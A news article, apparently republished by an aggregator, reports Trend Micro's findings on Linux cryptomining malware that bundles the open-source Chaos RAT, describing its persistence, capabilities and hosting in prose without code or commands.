Researchers smell a crypto mining chaos RAT targeting Linux • The Register

A type of cryptomining malware targeting Linux-based systems has additional capabilities by integrating an open source remote access trojan called Chaos RAT with several advanced features that attackers can use to control remote operating systems.

Trend Micro security researchers discovered the threat last month. Like previous similar versions of the miner, which also target Linux operating systems, the code kills competing malware and resources that hamper cryptocurrency mining performance.

The newer malware then creates persistence “by changing itself /etc/crontab File, a UNIX scheduler, which in this case downloads itself from Pastebin every 10 minutes,” write Trend Micro researchers David Fiser and Alfredo Oliveira.

After that, it downloads an XMRig miner, a configuration file, another payload that continuously kills competing malware, and the Chaos RAT (Remote Access Tool), which is written in Go and has a ton of features including restarting and shutting down the computer the victim .

In addition, the open-source tool can run reverse shell on the infected system, take screenshots of the victim’s device, collect information about the operating system, and download, upload, or even delete files.

“An interesting feature of the malware family we intercepted is that the address and access token are passed as compilation flags and hard-coded in the RAT client, replacing all data in variables from the main code,” they wrote researcher.

They also noted that the main server used to download payloads appears to be located in Russia, while the Chaos RAT connects to another command-and-control server believed to be located there located in Hong Kong.

It is worth noting that the Russian server was also used for bulletproof cloud hosting – the infrastructure services provided by other shady characters that criminals can use to launch and usually hide their cyber attacks and other illegal activities. According to Trend Micro researchers, other cybercriminals have used the same hosting service for their attacks on cloud infrastructure, containers, and Linux servers.

“On the surface, the inclusion of a RAT in the infection routine of a cryptocurrency mining malware may seem relatively insignificant,” said Fiser and Oliveira.

“However, given the richness of the tool’s capabilities and the fact that this development shows that cloud-based threat actors are still evolving their campaigns, it is important that both organizations and individuals remain extra vigilant when it comes to security,” they continued . ®

https://www.theregister.com/2022/12/13/cryptoming_chaos_rat_targets_linux/ Researchers smell a crypto mining chaos RAT targeting Linux • The Register

Rick Schindler

World Time Todays is an automatic aggregator of the all world’s media. In each content, the hyperlink to the primary source is specified. All trademarks belong to their rightful owners, all materials to their authors. If you are the owner of the content and do not want us to publish your materials, please contact us by email – admin@worldtimetodays.com. The content will be deleted within 24 hours.

Related Articles

Back to top button